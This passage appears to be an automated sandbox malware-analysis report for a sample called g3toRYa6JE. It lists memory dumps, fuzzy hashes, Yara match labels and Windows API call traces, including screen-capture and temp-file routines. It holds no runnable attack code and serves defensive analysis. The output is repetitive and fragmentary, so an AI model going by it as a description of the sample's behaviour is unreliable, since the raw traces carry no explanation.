                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                              • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00410662,0078FE56), ref: 007908C2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                              • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872584271.0000000000693000.00000040.00000020.00020000.00000000.sdmp, Offset: 00693000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_693000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: m;i
                                                                                                                                                                                                                              • API String ID: 0-3079845797
                                                                                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                              • Instruction ID: 54a6bd2ca7680878090a213321b752529e2d3b2f1b4288cdbd15cd88f3731b8c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3117C72340510EFDB44DE55DC81FA673EEEB88320B298069ED04DB756E675ED02C760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                              • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                              • Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e11138b8b53125bfb62bbdd7b14adb9d1d5bdfc0d8b53bd9fde03df388fd17e9
                                                                                                                                                                                                                              • Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e11138b8b53125bfb62bbdd7b14adb9d1d5bdfc0d8b53bd9fde03df388fd17e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                              • Instruction ID: 8f43e5c4f579ee96c8052a97cb5d657403b5851b239b2053d76393723de42ced
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CD1963260C1A24AC76D4A39887403ABFE16AD336131D479EE8F7CB5C6ED2CD954E660
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction ID: 2159518ba818c92f6d0fb382b6466eb41b94764a80ca284e604382ae389fa58f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 989137721090A349D7AD463AC97403EFFE15AD33B1319079EE4F2CA1C5FE28D965E621
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction ID: cdeef011a2c167e0ce18f750ad9a9400875e83c82def8c5d63d4999d96ee263b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D9143731090E34ADBAD467A853403EFFE15AD37A131A079DD4F2CA1C5FE28C964E621
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction ID: ae829576d1db609c6c2ff633afbb205da39b4303f2bfd765a8efa9cb8389ea8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7891257220D0A34EDB6D46398D7403EFFE15AD33A171A07ADE4F2CA1C5EE18DA55E620
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                                                                                                                                              • Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                              • Instruction ID: f239fba92464787bc0e2aa88d15e13edcb7f418df04b3dac50933ed4382424a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61615672600708A6DB386A688899BBF6395EFC3704F100B1AF883DBED1D61DED418755
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction ID: 93cadbc9e56ee973348f3b1b45f0aee1066a3e574f5d0b7d1e0efa6f5899e2a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8581637230D1B34AEB294239957843FFFE15A523A135A079FD4F2CA2C1EE18CA55D624
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction ID: 87963f200edc8939af20cfb9b5b2d2c11994fbdc4d4fe738e11ace3cc5bbeb5d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 218133B220D0A349DB6D463D897443EFFE55AD33A231A479DE4F2CA1C5EE288554E630
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                              • Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                              • Instruction ID: 1ce456ca347f6df924acc47ec71aeab3b120a2367e21c528d13a255acacc8b3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47112B7721104147D6D8C66DD8B42BBA795FBC7320BBC837AD0414B758DF3EA954D602
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                              • Instruction ID: c137a415cd33a37c16b2a2ea5c25f585a778bfd2a950d56cefb96e01b2f897f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C01F272B406008FDF61EF60C805BAB33E5FB86306F0544A4D90A97282E378A8498BD0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00402140
                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00402147
                                                                                                                                                                                                                              • CreateSolidBrush.GDI32(00646464), ref: 0040215A
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0040216E
                                                                                                                                                                                                                              • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00402187
                                                                                                                                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
                                                                                                                                                                                                                              • MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
                                                                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004021E0
                                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0040225D
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040226C
                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00402275
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                              • String ID: Tahoma
                                                                                                                                                                                                                              • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                              • Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                              • Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 004025C3
                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
                                                                                                                                                                                                                              • ReleaseCapture.USER32 ref: 004025E8
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040260F
                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 0040269F
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004026A9
                                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004026E0
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402727
                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 0040272E
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00402735
                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00402743
                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 0040274A
                                                                                                                                                                                                                              • SetCapture.USER32(?), ref: 00402797
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 004027CB
                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004027E1
                                                                                                                                                                                                                              • GetKeyState.USER32(0000001B), ref: 004027EE
                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00402803
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                              • String ID: hef
                                                                                                                                                                                                                              • API String ID: 2545303185-98441221
                                                                                                                                                                                                                              • Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                              • Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                              • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                                                                                                                                              • Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                              • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                              • Instruction ID: 4bf4cffdfa47e9a0cb93ac75da0914fd763329be97b5ed08f62dd07cc544e146
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
